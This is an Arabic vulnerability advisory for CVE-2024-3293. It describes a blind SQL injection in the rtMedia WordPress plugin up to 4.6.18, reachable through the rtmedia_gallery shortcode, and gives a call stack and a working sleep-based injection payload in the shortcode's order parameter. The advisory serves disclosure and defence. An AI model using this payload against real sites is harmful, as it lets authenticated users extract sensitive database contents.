
CVE-2024-3293 rtMedia لـ WordPress وBuddyPress وbbPress <= 4.6.18 - حقن SQL للمستخدمين المصادَق عليهم (بصلاحية مساهم أو أعلى) عبر الكود القصير rtmedia_gallery
rtMedia لـ WordPress وBuddyPress وbbPress <= 4.6.18 - حقن SQL بعد المصادقة (مساهم+) عبر الكود المختصر rtmedia_gallery
الوصف
إضافة rtMedia لـ WordPress وBuddyPress وbbPress في ووردبريس معرّضة لثغرة حقن SQL أعمى عبر الكود المختصر rtmedia_gallery في جميع الإصدارات حتى 4.6.18 وما يشملها، وذلك بسبب عدم كفاية الهروب من المعامل المقدَّم من المستخدم وعدم الإعداد الكافي لاستعلام SQL الموجود. وهذا يتيح للمهاجمين المصادقين، ممن لديهم وصول بمستوى المساهم أو أعلى، إلحاق استعلامات SQL إضافية بالاستعلامات القائمة، والتي يمكن استخدامها لاستخراج معلومات حساسة من قاعدة البيانات.
مكدس الاستدعاءات
RTMediaModel->get (\buddypress-media\app\helper\RTMediaModel.php:61)
RTMediaModel->get_media (\buddypress-media\app\helper\RTMediaModel.php:227)
RTMediaQuery->populate_media (\buddypress-media\app\main\routers\query\RTMediaQuery.php:869)
RTMediaQuery->populate_data (\buddypress-media\app\main\routers\query\RTMediaQuery.php:993)
RTMediaQuery->get_data (\buddypress-media\app\main\routers\query\RTMediaQuery.php:1214)
RTMediaQuery->query (\buddypress-media\app\main\routers\query\RTMediaQuery.php:684)
RTMediaQuery->__construct (\buddypress-media\app\main\routers\query\RTMediaQuery.php:184)
RTMediaGalleryShortcode::render (\buddypress-media\app\main\controllers\shortcodes\RTMediaGalleryShortcode.php:271)
الحمولة:
[rtmedia_gallery global="true" album_id="57" order_by="ratings" order=",media_id,(select 1 from (select sleep(IF(1=1,5,0)))x)"]


الحمولة الصحيحة:

الحمولة الخاطئة:
